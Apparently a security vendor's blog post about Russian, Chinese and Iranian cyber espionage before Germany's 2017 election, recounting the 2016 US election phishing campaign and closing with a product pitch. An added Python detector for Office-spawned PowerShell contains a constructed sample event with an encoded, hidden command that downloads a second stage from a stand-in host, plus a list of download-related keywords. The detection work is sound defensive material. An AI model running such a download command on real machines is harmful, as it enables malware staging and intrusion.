German elections are scheduled for September, and the country’s authorities are determined to conduct them without interference, especially Russian interference. The German domestic intelligence and security service, Bundesamt für Verfassungsschutz (BfV), has warned of the ever-increasing instances of nation-state cyber espionage.
The BfV’s annual Report on the Protection of the Constitution identifies Russia, China and Iran as the primary players in cyber espionage targeting German interests. Russia is primarily focused on pushing its political and geopolitical narrative. China, however, is focused on industry, research, technology and the armed forces. The Iranian effort has been focused on critical infrastructure, with cyber attacks used not only for information collection but also for sabotage.
Cyber Commands flourish in Europe
In recognition of the growing cyber threat, the German military, or Bundeswehr, launched a new Cyber and Information Space Command (CIS) in April to tackle attacks from hackers and foreign spy agencies.
The Bundeswehr has long been seen as a high-value target because of its military secrets, but its IT-supported weapons systems also mean that a successful cyber attack could have devastating global consequences. The CIS is by no means the first cyber command to be established in Europe. The EU’s European Cybercrime Centre (EC3) was established in 2013 and has a threefold focus on forensics, strategy and operations. In France, the Sub-directorate in the fight against cybercrime (SDLC) was established in 2014 and is staffed both by gendarmes, who are part of the military, and the police. The SDLC works closely with EC3.
In June 2016, NATO designated cyber as an official operational domain of warfare, along with air, land and sea, having witnessed a five-fold increase in suspicious events on its networks in the previous three years. The UK moved towards a more active defense of cyberspace in 2016 when it created the National Cyber Security Centre. It aims to protect government and critical infrastructure from cyber attack, and is part of GCHQ, the UK Government Communications Headquarters.
It is perhaps no coincidence that, following allegations of Russian interference in the US presidential elections last year, Germany has chosen to launch CIS in 2017, the year when its own elections will be held.
Lessons learned from the 2016 US Presidential Election
As the general election date in Germany draws closer, it can be expected that cyber attacks will increase. An NSA intelligence report on Russian interference in the 2016 Presidential election noted that Russian military intelligence executed a cyberattack on at least one US voting software supplier and sent spear-phishing emails to more than 100 local election officials just days prior to the election. The report analyzed intelligence about the months-long Russian intelligence cyber effort against elements of the US election and voting infrastructure.
It appears that Russian government hackers focused on parts of the system directly connected to the voter registration process, including a private sector manufacturer of devices that maintain and verify voter rolls. The phishing campaign was simple: pose as an e-voting vendor and trick local government employees into opening Microsoft Word documents laced with invisible malware that provided hackers full control over infected computers.
These particular weaponized files used PowerShell, a Microsoft scripting language designed for system administrators and installed by default on Windows computers, allowing vast control over a system’s settings and functions. If opened, the files likely would have instructed the infected computer to begin downloading in the background a second package of malware from a remote server also controlled by the hackers, which the secret report said could have provided attackers with “persistent access” to the computer or the ability to “survey the victims for items of interest.” Essentially, the weaponized Word document quietly unlocked and opened the target’s back door, allowing virtually any cocktail of malware to be subsequently delivered automatically.
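The chain described above, a Word document starting PowerShell to fetch a second stage, leaves a recognizable trail in process-creation logs. The following Python is an added example, not taken from the article or the NSA report: it flags Office applications that spawn PowerShell and decodes any -EncodedCommand argument before looking for download activity. The event field names, the keyword list and the sample events are assumptions constructed for illustration.

```python
import base64
import re

# Office applications that should not normally start a script interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Substrings suggesting the command fetches content from a remote host.
DOWNLOAD_HINTS = ("downloadstring", "downloadfile", "invoke-webrequest",
                  "net.webclient", "start-bitstransfer")
# -EncodedCommand and its accepted abbreviations (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"(?i)\s-(?:ec|en[a-z]*|e)\s+([A-Za-z0-9+/=]{16,})")

def basename(path):
    """Lower-cased file name of a Windows or POSIX style path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text (base64 of UTF-16LE) or ''."""
    match = ENC_FLAG.search(cmdline)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # bad base64 or invalid UTF-16 (both are ValueError)
        return ""

def assess(event):
    """Classify one process-creation event: None, 'suspicious' or 'high'."""
    if basename(event["parent"]) not in OFFICE_PARENTS:
        return None
    if basename(event["image"]) not in POWERSHELL:
        return None
    text = (event["cmdline"] + " " + decode_encoded_command(event["cmdline"])).lower()
    return "high" if any(hint in text for hint in DOWNLOAD_HINTS) else "suspicious"

def _enc(script):
    """Build an -EncodedCommand value; used only for the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

WORD = r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events; the field names are assumptions, not a real log schema.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": PS, "cmdline": "powershell.exe Get-Process"},
    {"parent": WORD, "image": PS, "cmdline": "powershell.exe -NoProfile Get-Date"},
    {"parent": WORD, "image": PS, "cmdline": "powershell.exe -w hidden -enc "
     + _enc("Invoke-WebRequest -Uri http://stage2.example.invalid/p -OutFile p.bin")},
    {"parent": WORD, "image": r"C:\Windows\splwow64.exe", "cmdline": "splwow64.exe 8192"},
]
```

Run over the sample, only the third event is rated high, and only because the encoded argument is decoded first; the raw command line contains none of the download keywords.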
Operations to influence electoral outcomes have been ongoing for over 10 years. As these operations grow in frequency, reach and sophistication, it becomes all the more important to take action to prepare and react. The damage that these operations wreak cannot be overstated.
Further, once malware has been discovered and the political establishment shifts into damage control, the secondary focus must be the supplemental malware that has been seeded by the primary breaching software.
Organizations require the ability to determine that a breach has been fully and completely addressed and rectified. The integrity of the system needs to be protected. Political parties, candidates and the political infrastructures of all European countries must be rigorously defended.
Take a Proactive Stance with Infocyte
True defense is much more than standard defensive measures. In the same way that soldiers patrol border walls, electronic systems and data require vigilant and regular spot checks.
Infocyte HUNT offers organizations the ability to scan endpoints and to find and identify any suspicious software that has penetrated defenses, whether or not it is already known as malware. Validating the health of an endpoint in this way provides a unique and specific reassurance.
In the current geopolitical climate, it is incumbent upon each and every political actor to take all possible steps to protect the integrity of the democratic political system and government.